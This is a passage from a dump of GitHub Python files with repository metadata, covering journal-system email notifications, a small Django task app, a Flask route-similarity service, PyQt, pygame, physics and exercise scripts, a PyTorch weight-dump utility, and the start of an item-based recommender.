log_dict=log_dict,\n )\n\n\ndef preprint_notification(**kwargs):\n \"\"\"\n Called by events.Event.ON_PREPRINT_NOTIFICATION handles logging and emails.\n :param kwargs: Dict with preprint, content and request objects\n :return: None\n \"\"\"\n request = kwargs.get('request')\n preprint = kwargs.get('preprint')\n content = kwargs.get('email_content')\n skip = kwargs.get('skip')\n\n if preprint.date_declined:\n types = 'Rejected'\n description = '<p>{editor} has rejected \\'{title}\\'. Moderator reason:</p><p>{reason}</p>'.format(\n editor=request.user.full_name(),\n title=preprint.title,\n reason=preprint.preprint_decline_note,\n )\n else:\n types = 'Accepted'\n description = '{editor} has published \\'{title}\\'.'.format(\n editor=request.user.full_name(),\n title=preprint.title,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': types,\n 'target': preprint,\n }\n\n util_models.LogEntry.add_entry(\n types,\n description,\n 'Info',\n request.user,\n request,\n preprint,\n )\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Submission Decision'.format(preprint.title),\n preprint.owner.email,\n content,\n log_dict=log_dict,\n )\n\n # Stops this notification being sent multiple times.c\n preprint.preprint_decision_notification = True\n preprint.save()\n\n\ndef preprint_comment(**kwargs):\n request = kwargs.get('request')\n preprint = kwargs.get('preprint')\n\n path = reverse(\n 'repository_comments',\n kwargs={'preprint_id': preprint.pk},\n )\n url = request.repository.site_url(path)\n\n email_text = 'A comment has been made on your article {title}, you can moderate comments ' \\\n '<a href=\"{url}\">on the journal site</a>.'.format(\n title=preprint.title,\n url=url,\n )\n\n description = '{author} commented on {title}'.format(\n author=request.user.full_name(),\n title=preprint.title,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Preprint Comment',\n 'target': preprint,\n }\n\n notify_helpers.send_email_with_body_from_user(\n request,\n 'Preprint Comment',\n preprint.owner.email,\n email_text,\n log_dict=log_dict,\n )\n\n\ndef preprint_version_update(**kwargs):\n request = kwargs.get('request')\n pending_update = kwargs.get('pending_update')\n action = kwargs.get('action')\n reason = kwargs.get('reason')\n\n description = '{object} Pending Version {pk}: Decision: {decision}'.format(\n object=request.repository.object_name,\n pk=pending_update.pk,\n decision=action,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Preprint Publication',\n 'target': pending_update.preprint,\n }\n\n context = {\n 'pending_update': pending_update,\n 'reason': reason,\n }\n\n if action == 'accept':\n template = request.repository.accept_version\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n else:\n template = request.repository.decline_version\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Version Update'.format(pending_update.preprint.title),\n pending_update.preprint.owner.email,\n email_text,\n log_dict=log_dict,\n )\n\n\ndef send_cancel_corrections(**kwargs):\n request = kwargs.get('request')\n article = kwargs.get('article')\n correction = kwargs.get('correction')\n\n description = '{user} has cancelled correction task {task}'.format(\n user=request.user,\n 
task=correction,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Correction Cancelled',\n 'target': article,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_correction_cancelled',\n 'subject_notify_correction_cancelled',\n correction.typesetter.email,\n context=kwargs,\n log_dict=log_dict,\n )\n\n\ndef get_assignment_editors(assignment):\n \"\"\" Get editors relevant to a review or revision assignment\n\n This is a helper function to retrieve the editors that should be\n notified of changes in a review/ revision assignment.\n It exists to handle edge-cases where anassignment might not have an editor\n assigned (e.g.: migrated submissions from another system)\n :param assignment: an instance of ReviewAssignment or RevisionRequest\n :return: A list of Account objects\n \"\"\"\n article = assignment.article\n if assignment.editor:\n editors = [assignment.editor]\n elif article.editorassignment_set.exists():\n # Try article assignment\n editors = [ass.editor for ass in article.editorassignment_set.all()]\n else:\n # Fallback to all editors\n editors = [e for e in assignment.article.journal.editors()]\n return editors\n\n\ndef send_draft_decision_declined(**kwargs):\n request = kwargs.get('request')\n article = kwargs.get('article')\n draft_decision = kwargs.get('draft_decision')\n\n description = '{user} has declined a draft decision {draft} written by {section_editor}'.format(\n user=request.user,\n draft=draft_decision.pk,\n section_editor=draft_decision.section_editor.full_name,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Draft Decision Declined',\n 'target': article,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_se_draft_declined',\n 'subject_notify_se_draft_declined',\n draft_decision.section_editor.email,\n context=kwargs,\n log_dict=log_dict,\n )\n\n\ndef access_request_notification(**kwargs):\n request = kwargs.get('request')\n access_request = kwargs.get('access_request')\n description = '{} has requested the {} role for {}'.format(\n request.user,\n access_request.role.name,\n request.site_type.name,\n )\n\n if request.journal:\n contact = request.journal.get_setting('general', 'submission_access_request_contact')\n else:\n contact = request.repository.submission_access_contact\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Access Request',\n 'target': request.site_type,\n }\n if contact:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_access_request_notification',\n 'subject_submission_access_request_notification',\n contact,\n context={'description': description},\n log_dict=log_dict,\n )\n\n\ndef access_request_complete(**kwargs):\n request = kwargs.get('request')\n access_request = kwargs.get('access_request')\n decision = kwargs.get('decision')\n description = \"Access request from {} evaluated by {}: {}\".format(\n access_request.user.full_name,\n request.user,\n decision,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Access Request',\n 'target': request.site_type,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_access_request_complete',\n 'subject_submission_access_request_complete',\n access_request.user.email,\n context={\n 'access_request': access_request,\n 'decision': decision,\n },\n log_dict=log_dict,\n )\n\n\ndef preprint_review_notification(**kwargs):\n request = 
kwargs.get('request')\n preprint = kwargs.get('preprint')\n review = kwargs.get('review')\n message = kwargs.get('message')\n skip = kwargs.get('skip', None)\n\n if not skip:\n description = 'Review of {} requested from {} by {}.'.format(\n preprint.title,\n review.reviewer.full_name(),\n review.manager.full_name(),\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Review',\n 'target': preprint,\n }\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Review Invitation'.format(request.repository.object_name),\n review.reviewer.email,\n message,\n log_dict=log_dict,\n )\n\n\ndef preprint_review_status_change(**kwargs):\n request = kwargs.get('request')\n review = kwargs.get('review')\n status_change = kwargs.get('status_change')\n status_text = None\n\n description = \"Status of review {} by {} is now: {}\".format(\n review.pk,\n review.reviewer.full_name(),\n status_change,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Review',\n 'target': review.preprint,\n }\n\n if status_change in ['accept', 'decline', 'complete']:\n to = review.manager.email\n if status_change == 'accept':\n status_text = 'The reviewer has agreed to add a comment.'\n elif status_change == 'decline':\n status_text = 'The reviewer has declined to add a comment.'\n elif status_change == 'complete':\n status_text = 'The reviewer has submitted their comment.'\n template = request.repository.manager_review_status_change\n else: # withdraw\n to = review.reviewer.email\n template = request.repository.reviewer_review_status_change\n\n context = {\n 'review': review,\n 'status_text': status_text,\n 'url': request.repository.site_url(path=reverse(\n 'repository_review_detail',\n kwargs={\n 'preprint_id': review.preprint.pk,\n 'review_id': review.pk\n }\n ))\n }\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Review Invitation Status'.format(request.repository.object_name),\n to,\n email_text,\n log_dict=log_dict,\n )\n","repo_name":"BirkbeckCTP/janeway","sub_path":"src/utils/transactional_emails.py","file_name":"transactional_emails.py","file_ext":"py","file_size_in_byte":61266,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"16"} +{"seq_id":"15664136315","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth.models import User\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom .models import Project, Task\r\nfrom django.shortcuts import get_object_or_404\r\nfrom .forms import CreateNewTask\r\nfrom .forms import CreateNewProject\r\n\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n title = \"welcome to Django course !!\"\r\n return render(request, 'index.html', {\r\n \"title\": title\r\n })\r\n\r\n\r\ndef hello(request, username):\r\n return HttpResponse(\"<h1>Hello %s </h1>\" % username)\r\n\r\ndef projects(request):\r\n #projects = list(Project.objects.values())\r\n projects = Project.objects.all()\r\n return render(request, 'projects/projects.html', {\r\n \"projects\": projects\r\n })\r\n\r\ndef tasks(request):\r\n #task = get_object_or_404(Task, id=id)\r\n tasks = Task.objects.all()\r\n return render(request, 'tasks/tasks.html', {\r\n \"tasks\": tasks\r\n })\r\n\r\ndef create_task(request):\r\n if request.method == 'GET':\r\n return render(request, 
\"tasks/create_task.html\", {\r\n \"form\": CreateNewTask\r\n })\r\n else:\r\n Task.objects.create(title=request.POST['title'], description=request.POST['description'], project_id=2)\r\n return redirect(\"Tasks\")\r\n\r\n\r\ndef create_project(request):\r\n if request.method == 'GET':\r\n return render(request, \"projects/create_project.html\", {\r\n \"form\": CreateNewProject\r\n })\r\n else:\r\n Project.objects.create(name= request.POST[\"name\"])\r\n redirect(\"Projects\")\r\n\r\ndef signup(request):\r\n\r\n if request.method == 'GET':\r\n return render(request, \"user/signup.html\", {\r\n 'form' : UserCreationForm\r\n })\r\n \r\n else:\r\n if request.POST['password1'] == request.POST['password2']:\r\n try:\r\n user = User.objects.create_user(username= request.POST['username'], password= request.POST['password1'])\r\n user.save()\r\n return HttpResponse(\"user created successfully\")\r\n except:\r\n return render(request, \"user/signup.html\", {\r\n 'form' : UserCreationForm,\r\n 'error': 'username already exists'\r\n })\r\n return render(request, \"user/signup.html\", {\r\n 'form' : UserCreationForm,\r\n 'error': 'Password is incorrect'\r\n })\r\n\r\n \r\n\r\n\r\n","repo_name":"cruzisaac51/Django-Project","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37480967147","text":"from flask import Flask, request, jsonify\nfrom polyline import decode\nfrom math import radians, sin, cos, sqrt, atan2\n\napp = Flask(__name__)\n\ndef haversine_distance(lat1, lon1, lat2, lon2):\n R = 6371 # Radius of the Earth in kilometers\n\n # Convert latitude and longitude to radians\n lat1, lon1, lat2, lon2 = map(radians, [lat1, lon1, lat2, lon2])\n\n # Calculate the differences in coordinates\n dlat = lat2 - lat1\n dlon = lon2 - lon1\n\n # Apply the Haversine formula\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n distance = R * c\n\n return distance\n\n\ndef compare_routes(route1, route2):\n total_distance = 0\n total_points = min(len(route1), len(route2))\n\n for i in range(total_points - 1, -1, -1): # Iterate from last coordinates to first\n lat1, lon1 = route1[i]\n lat2, lon2 = route2[i]\n distance = haversine_distance(lat1, lon1, lat2, lon2)\n total_distance += distance\n\n average_distance = total_distance / total_points\n similarity_score = 1 - (average_distance / 100) # Normalize the score between 0 and 1\n\n return similarity_score\n\n\n@app.route('/compare_routes', methods=['POST'])\ndef compare_routes_handler():\n data = request.json\n\n polyline1 = data.get('polyline1', '')\n polyline2 = data.get('polyline2', '')\n\n route1 = decode(polyline1)\n route2 = decode(polyline2)\n\n similarity = compare_routes(route1[::-1], route2[::-1]) # Reverse the routes\n\n response = {\n 'similarity_score': similarity\n }\n\n return jsonify(response)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"AsavaAsava/SchoolPool","sub_path":"routing_algorithm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"21436900714","text":"\nimport sys\nfrom PyQt4 import QtCore, QtGui\nfrom guiElements import *\n\ndef navegationEvents(GUI):\n GUI.pushButton.clicked.connect(lambda: changeWindow(GUI, GUI.pushButton))\n GUI.pushButton_2.clicked.connect(lambda: changeWindow(GUI, 
GUI.pushButton_2))\n\ndef changeWindow(GUI, btn):\n stackTo = int(btn.objectName())\n GUI.stackedWidget.setCurrentIndex(stackTo)\n\n\n \n\nif __name__ == \"__main__\":\n \n app = QtGui.QApplication(sys.argv)\n MainWindow = QtGui.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n\n navegationEvents(ui)\n\n MainWindow.show()\n sys.exit(app.exec_())\n\n","repo_name":"pablo-novoa/Python","sub_path":"sitchLayoutsQT/switchLayouts.py","file_name":"switchLayouts.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26415541768","text":"import pygame\n#from board import findPosition\nimport board\nfrom options import *\n\nclass Animation(pygame.sprite.Sprite):\n image = None\n rect = None\n\n sliding = False\n falling = False\n location = None\n\n tick = 0\n\n def fallen(self):\n (column, row) = self.location\n if column == 0:\n self.location = (COLUMNS-1, row)\n elif column == COLUMNS-1:\n self.location = (0, row)\n elif row == 0:\n self.location = (column, ROWS-1)\n elif row == ROWS-1:\n self.location = (column, 0)\n self.rect = self.image.get_rect()\n self.rect.center = board.findPosition(self.location)\n\n def fall(self):\n center = self.rect.center\n width = self.image.get_width()\n height = self.image.get_height()\n\n try:\n self.image = pygame.transform.scale(self.image,\n (width-5, height-5))\n self.rect = self.image.get_rect(center=center)\n except ValueError:\n self.falling = False\n self.image = self.imageCopy\n\n self.fallen()\n\n\n def slide(self, direction=-1, location=None, rect=None, speed=3):\n if not location:\n location = self.location\n if not rect:\n rect = self.rect\n\n (column, row) = location\n position = rect.center\n\n if direction == -1:\n direction = self.sliding\n\n if direction == EAST:\n destination = board.findPosition((column+1, row))\n if position[COLUMN] >= destination[COLUMN]:\n self.sliding = -1\n if column+1 == COLUMNS:\n self.falling = True\n else:\n self.location = (column+1, row)\n else:\n rect.left += speed\n elif direction == WEST:\n destination = board.findPosition((column-1, row))\n if position[COLUMN] <= destination[COLUMN]:\n self.sliding = -1\n if column-1 == -1:\n self.falling = True\n else:\n self.location = (column-1, row)\n else:\n rect.left -= speed\n elif direction == NORTH:\n destination = board.findPosition((column, row-1))\n if position[ROW] <= destination[ROW]:\n self.sliding = -1\n if row-1 == -1:\n self.falling = True\n else:\n self.location = (column, row-1)\n else:\n rect.top -= speed\n elif direction == SOUTH:\n destination = board.findPosition((column, row+1))\n if position[ROW] >= destination[ROW]:\n self.sliding = -1\n if row+1 == ROWS:\n self.falling = True\n else:\n self.location = (column, row+1)\n else:\n rect.top += 3\n\n def bounce(self, speed=2):\n if not self.movement:\n if self.direction == SOUTH:\n self.rect.top += speed\n elif self.direction == NORTH:\n self.rect.top -= speed\n elif self.direction == EAST:\n self.rect.left += speed\n elif self.direction == WEST:\n self.rect.left -= speed\n else:\n if self.direction == SOUTH:\n self.rect.top -= speed\n elif self.direction == NORTH:\n self.rect.top += speed\n elif self.direction == EAST:\n self.rect.left -= speed\n elif self.direction == WEST:\n self.rect.left += speed\n\n\n def update(self):\n self.tick += 1\n\n if self.sliding > -1:\n self.slide()\n elif self.falling:\n self.fall()\n\n 
\n\n","repo_name":"pdevine/happytown-python","sub_path":"gamelib-old/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24998508943","text":"import numpy as np\nimport scipy.integrate as spi\nimport matplotlib.pyplot as plt\n\n\ndef f(x, a):\n\tx = np.array([x]) if isinstance(x, int) else x\n\tx = np.array([x]) if isinstance(x, float) else x\n\tx = np.array(x) if isinstance(x, list) else x\n\tx = x.astype(np.float)\n\t# print(type(x))\n\tassert type(x) == np.ndarray\n\tnorm = np.sqrt(12. / (a * a * a))\n\treturn np.piecewise(x, [x < a / 2., x >= a / 2.], [lambda x: norm * x, lambda x: norm * (a - x)])\n\n\ndef psi_n(x, n, a):\n\treturn np.sqrt(2. / a) * np.sin(n * x * np.pi / a)\n\n\ndef init_fun(x, n, a):\n\treturn f(x, a) * psi_n(x, n, a)\n\n\ndef c(n, a):\n\tif n == 0 or n % 2 == 0:\n\t\treturn\n\treturn spi.quad(init_fun, 0, a, args=(n, a), limit=100)[0]\n\n\ndef run():\n\t# print(f_slow(0, 10.), f_slow(3, 10), f_slow(5, 10), f_slow(7, 10), f_slow(10, 10))\n\n\ta = np.array([3.])\n\t# a = 3.\n\t# print(f(a, 10.))\n\t# print(f(np.array([0, 3, 5, 7, 10], dtype=float), 10))\n\t# exit()\n\n\t\"\"\"\n\t# fig0 = plt.figure(figsize=(10, 8))\n\tx_r = np.arange(0, 10, 0.01)\n\tplt.plot(x_r, f(x_r, 10))\n\tplt.show()\n\t\"\"\"\n\n\tNmax = 40\n\ta_l = 10.\n\ta_step = 10./100\n\tnl = np.array(range(Nmax))\n\tcx = np.array([c(n, a_l) for n in nl])\n\tprint(cx)\n\tprint(cx.shape)\n\tprint(cx[0], cx[1], cx[2], cx[3], cx[4])\n\tprint(np.sum(cx * cx), cx[Nmax - 1])\n\n\nif __name__ == '__main__':\n\trun()\n","repo_name":"zhangzhengde0225/quantum_element","sub_path":"Schrodinger/QMPython/infinite_square_well_solution.py","file_name":"infinite_square_well_solution.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"18696788609","text":"import math\r\nimport unittest\r\nimport warnings\r\nfrom collections import defaultdict\r\n\r\n\r\ndef odstrani_enake(s, t):\r\n i = 0\r\n while i < len(s):\r\n if s[i] == t[i]:\r\n del s[i]\r\n del t[i]\r\n else:\r\n i += 1\r\n\r\n\r\ndef diff(datoteka1, datoteka2):\r\n razlike = []\r\n st_vrstice = 1\r\n # lahko zazipamo vrstici dveh datotek\r\n for ime in zip(open(datoteka1), open(datoteka2)):\r\n ime1,ime2 = ime\r\n if ime1 != ime2:\r\n # Tudi če ne pokaže metode strip() na stringih seveda deluje\r\n razlike.append((st_vrstice, ime1.strip(), ime2.strip()))\r\n st_vrstice += 1\r\n return razlike\r\n\r\n\r\ndef mesta(s):\r\n seznam = []\r\n _mesta = defaultdict(list)\r\n for ime,mesto in s:\r\n _mesta[mesto].append(ime)\r\n for mesto in _mesta:\r\n seznam.append(_mesta[mesto])\r\n if len(_mesta[mesto]) > 1:\r\n for m in _mesta[mesto][1:]:\r\n seznam.append([])\r\n return seznam\r\n\r\n\r\ndef dovolj_lihih(s, n):\r\n if s == [] and n > 0:\r\n return False\r\n if s == [] and n <= 0:\r\n return True\r\n elif s[0] % 2 == 1:\r\n return dovolj_lihih(s[1:], n - 1)\r\n else:\r\n return dovolj_lihih(s[1:], n)\r\n\r\n\r\nclass Parkirisce:\r\n\r\n def __init__(self, parkirna_mesta):\r\n self.parkirna_mesta = parkirna_mesta\r\n self.parkirana_vozila = []\r\n self.vsota = 0\r\n self.zasedena = 0\r\n\r\n def prosto(self):\r\n return len(self.parkirana_vozila) < self.parkirna_mesta\r\n\r\n def parkiraj(self, registracija, cas):\r\n if self.prosto():\r\n self.parkirana_vozila.append((registracija, cas))\r\n\r\n def odpelji(self, registracija, 
cas):\r\n cena = 0\r\n for r,c in self.parkirana_vozila:\r\n if registracija == r:\r\n cena = abs(cas - c)\r\n self.parkirana_vozila.remove((r,c))\r\n break\r\n self.vsota += math.ceil(cena)\r\n return math.ceil(cena)\r\n\r\n def zasluzek(self):\r\n return self.vsota\r\n\r\n\r\n\r\n\r\nclass Test(unittest.TestCase):\r\n def setUp(self):\r\n warnings.simplefilter(\"ignore\", ResourceWarning)\r\n\r\n def test_01_odstrani_enake(self):\r\n a = [1, 3, 2, 13, 2, 4, 1]\r\n b = [8, 3, 13, 8, 2, 4, 5]\r\n self.assertIsNone(odstrani_enake(a, b))\r\n self.assertEqual([1, 2, 13, 1], a)\r\n self.assertEqual([8, 13, 8, 5], b)\r\n\r\n a = [1, 1, 1, 1, 1]\r\n b = [1, 1, 1, 1, 1]\r\n self.assertIsNone(odstrani_enake(a, b))\r\n self.assertEqual([], a)\r\n self.assertEqual([], b)\r\n\r\n def test_02_diff(self):\r\n with open(\"f1.txt\", \"wt\") as f:\r\n f.write(\"\"\"Ana\r\nBerta\r\nCecilija\r\nDani\r\nEma\"\"\")\r\n with open(\"f2.txt\", \"wt\") as f:\r\n f.write(\"\"\"Ana\r\nBerta\r\nCilka\r\nDani\r\nEva Ema\"\"\")\r\n self.assertEqual([(3, 'Cecilija', 'Cilka'), (5, 'Ema', 'Eva Ema')], diff(\"f1.txt\", \"f2.txt\"))\r\n\r\n def test_03_mesta(self):\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\"]],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 5)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\"], [], [\"Ema\"],\r\n [\"Fanči\", \"Greta\"], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 8), (\"Fanči\", 6), (\"Greta\", 6)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\", \"Ema\"], [], [],\r\n [\"Fanči\", \"Greta\"], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 6), (\"Greta\", 6)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\", \"Ema\", \"Fanči\"], [], [], [],\r\n [\"Greta\"]],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 6)]))\r\n self.assertEqual(\r\n [[\"Ana\"], [\"Berta\"], [\"Cilka\", \"Dani\", \"Ema\", \"Fanči\", \"Greta\"],\r\n [], [], [], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 13), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 12)]))\r\n self.assertEqual(\r\n [[\"Ana\", \"Berta\"], [], [\"Cilka\", \"Dani\", \"Ema\", \"Fanči\", \"Greta\"],\r\n [], [], [], []],\r\n mesta([(\"Ana\", 15), (\"Berta\", 15), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 12)]))\r\n self.assertEqual(\r\n [[\"Ana\", \"Berta\", \"Cilka\", \"Dani\", \"Ema\", \"Fanči\", \"Greta\"],\r\n [], [], [], [], [], []],\r\n mesta([(\"Ana\", 12), (\"Berta\", 12), (\"Cilka\", 12), (\"Dani\", 12),\r\n (\"Ema\", 12), (\"Fanči\", 12), (\"Greta\", 12)]))\r\n\r\n def test_04_dovolj_lihih(self):\r\n self.assertTrue(dovolj_lihih([], 0))\r\n self.assertFalse(dovolj_lihih([], 1))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 6))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 5))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 4))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 3))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 2))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 1))\r\n self.assertTrue(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 0))\r\n self.assertFalse(dovolj_lihih([4, 1, 3, 5, 6, 8, 7, 1, 3], 7))\r\n\r\n\r\n def test_05_parkirisce(self):\r\n parkirisce = Parkirisce(3)\r\n\r\n 
self.assertTrue(parkirisce.prosto())\r\n self.assertEqual(0, parkirisce.zasluzek())\r\n\r\n self.assertIsNone(parkirisce.parkiraj(\"A123\", 8.25))\r\n self.assertTrue(parkirisce.prosto()) # parkiran je A123\r\n self.assertEqual(0, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"Z234\", 8.50)\r\n self.assertTrue(parkirisce.prosto()) # parkirana A123 in Z234\r\n self.assertEqual(0, parkirisce.zasluzek())\r\n\r\n self.assertEqual(1, parkirisce.odpelji(\"Z234\", 8.75))\r\n self.assertTrue(parkirisce.prosto()) # parkirana je A123\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"B345\", 10.30)\r\n self.assertTrue(parkirisce.prosto()) # parkirana A123 in B345\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"C567\", 10.50)\r\n self.assertFalse(parkirisce.prosto()) # parkirani A123, B345, C567\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n parkirisce.parkiraj(\"D567\", 11.00) # ne more parkirati\r\n self.assertFalse(parkirisce.prosto()) # parkirani A123, B345, C567\r\n self.assertEqual(1, parkirisce.zasluzek())\r\n\r\n self.assertEqual(3, parkirisce.odpelji(\"A123\", 11.20))\r\n self.assertTrue(parkirisce.prosto()) # parkirani B345, C567\r\n self.assertEqual(4, parkirisce.zasluzek())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"sp9028/P1","sub_path":"Rešitve starih izpitov/12.8.py","file_name":"12.8.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29409237382","text":"#!/usr/bin/python\nimport sys\nimport argparse\nimport torch\nimport traceback\n\n\ndef save_model_txt(model, path):\n fout = open(path, \"w\")\n for k, v in model[\"model_sd\"].items(): # for image classifier\n fout.write(str(k) + \"\\n\")\n fout.write(str(v.tolist()) + \"\\n\")\n fout.close()\n\n\ndef load_model_txt(model, path):\n print(\"Loading...\")\n data_dict = {}\n fin = open(path, \"r\")\n i = 0\n odd = 1\n prev_key = None\n while True:\n s = fin.readline().strip()\n if not s:\n break\n if odd:\n prev_key = s\n else:\n try:\n val = eval(s)\n except Exception as e:\n print(traceback.format_stack(e))\n data_dict[prev_key] = s\n i += 1\n import IPython\n\n IPython.embed()\n continue\n if type(val) != type([]):\n data_dict[prev_key] = torch.FloatTensor([eval(s)])[0]\n else:\n data_dict[prev_key] = torch.FloatTensor(eval(s))\n i += 1\n odd = (odd + 1) % 2\n\n # Replace existing values with loaded\n own_state = model.state_dict()\n print(\"Items:\", len(own_state.items()))\n for k, v in data_dict.items():\n if not k in own_state:\n print(\"Parameter\", k, \"not found in own_state!!!\")\n else:\n try:\n own_state[k].copy_(v)\n except:\n print(\"Key:\", k)\n print(\"Old:\", own_state[k])\n print(\"New:\", v)\n sys.exit(0)\n print(\"Model loaded\")\n\n\nif __name__ == \"__main__\":\n # Run this script with python3 conda\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--weight_path\")\n args = parser.parse_args()\n weight_path = args.weight_path\n\n model = torch.load(weight_path, map_location=torch.device(\"cpu\"))\n if \".ckpt\" in weight_path:\n model = model[\"state_dict\"]\n save_name = weight_path.replace(\".ckpt\", \".txt\")\n elif \".pth\" in weight_path:\n save_name = weight_path.replace(\".pth\", \".txt\")\n else:\n save_name = weight_path.replace(\".pt\", \".txt\")\n save_model_txt(model, 
save_name)\n","repo_name":"sashank-tirumala/cloth_reskin_ros","sub_path":"delta_reskin_pkg/scripts/model_load_util.py","file_name":"model_load_util.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18313509335","text":"import argparse\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport math\nimport os \nimport warnings\n\nfrom sklearn.preprocessing import LabelEncoder\nwarnings.filterwarnings('ignore')\n\nfrom sklearn.model_selection import train_test_split\nfrom scipy.stats import pearsonr\nfrom tqdm import tqdm \nfrom evaluate import Recall,Precision,Coverage,Popularity,RMSE\n\nclass ItemCF():\n def __init__(self, file_path, mode):\n assert mode in ['cosine','pearsonr'], \"invalid mode\"\n self.mode = mode\n self.load_data(file_path)\n\n\n def load_data(self, file_path):\n \"\"\"\n 加载数据,分割训练集、验证集\n \"\"\"\n #data = pd.read_table(os.path.join(file_path,'ratings.dat'), sep='::', names = ['userID','itemID','Rating','Zip-code'])\n data = pd.read_csv(os.path.join(file_path, 'sample.csv'))\n uid_lbe = LabelEncoder()\n data['userID'] = uid_lbe.fit_transform(data['userID'])\n self.n_users = max(uid_lbe.classes_)\n iid_lbe = LabelEncoder()\n data['itemID'] = iid_lbe.fit_transform(data['itemID'])\n self.n_items = max(iid_lbe.classes_)\n\n self.train_data, self.valid_data = train_test_split(data,test_size=0.1)\n \n self.train_users = self.train_data.groupby('userID')['itemID'].apply(list).to_dict()\n self.valid_users = self.valid_data.groupby('userID')['itemID'].apply(list).to_dict()\n\n def pearsonrSim(self,x,y):\n \"\"\"\n 返回皮尔逊相关系数\n \"\"\"\n if len(x)==0:\n return 0\n elif len(x)<3:\n return 1\n else:\n return pearsonr(x,y)[0]\n\n def Pearsonr_ItemCF(self, K ,N):\n '''\n K: K表示的是相似用户的数量,每个用户都选择与其最相似的K个用户\n N: N表示的是给用户推荐的商品数量,给每个用户推荐相似度最大的N个商品\n 